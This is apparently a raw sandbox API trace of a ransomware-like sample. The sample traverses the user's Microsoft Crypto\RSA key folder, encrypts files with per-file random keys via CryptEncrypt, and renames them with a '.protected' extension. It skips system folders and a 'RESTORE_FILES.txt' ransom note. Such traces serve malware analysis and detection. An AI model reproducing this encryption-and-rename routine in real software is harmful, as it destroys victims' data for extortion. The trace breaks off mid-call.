[0089.878] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0089.878] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned 72 [0089.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.878] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.878] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.878] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.878] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 
[0089.878] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.878] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.") returned 72 [0089.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.878] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.878] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.878] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.878] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.879] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.879] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.879] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.879] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.879] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.879] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.879] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\..") returned 73 [0089.879] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.879] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0089.879] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.879] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.879] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.879] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.879] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Windows") returned -1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files") returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files (x86)") returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="$Recycle.bin") returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="System Volume Information") returned -1 [0089.879] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 117 [0089.879] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0089.879] lstrcmpW 
(lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0089.880] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned 119 [0089.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.891] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.891] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.891] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.") returned 119 [0089.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.891] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.891] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.891] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.891] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.891] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.891] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.891] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.891] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.891] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.891] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.891] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..") returned 120 [0089.891] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.891] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.892] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.892] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.892] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0089.892] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.892] StrStrIW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0089.892] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0089.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) 
returned 1 [0089.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.893] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0089.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.893] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0089.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.893] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0089.893] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2d, lpOverlapped=0x0) returned 1 [0089.894] SetFilePointerEx 
(in: hFile=0x154, liDistanceToMove=0xffffffd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.894] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2d, lpOverlapped=0x0) returned 1 [0089.894] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.894] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.894] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.895] CloseHandle (hObject=0x154) returned 1 [0089.895] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 197 [0089.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0089.896] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0089.896] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.896] StrStrIW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0089.896] lstrcmpW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0089.896] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.896] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.897] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0089.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.897] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0089.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.897] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0089.897] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x57, lpOverlapped=0x0) returned 1 [0089.898] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffa9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.898] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x57, lpOverlapped=0x0) returned 1 [0089.898] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.898] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.898] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.898] CloseHandle (hObject=0x154) returned 1 [0089.899] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 197 [0089.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0089.899] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0089.899] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.899] StrStrIW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0089.899] lstrcmpW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0089.899] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: 
pbBuffer=0x295e4fc) returned 1 [0089.900] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.900] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.901] StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0089.901] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.901] StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0089.901] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.901] 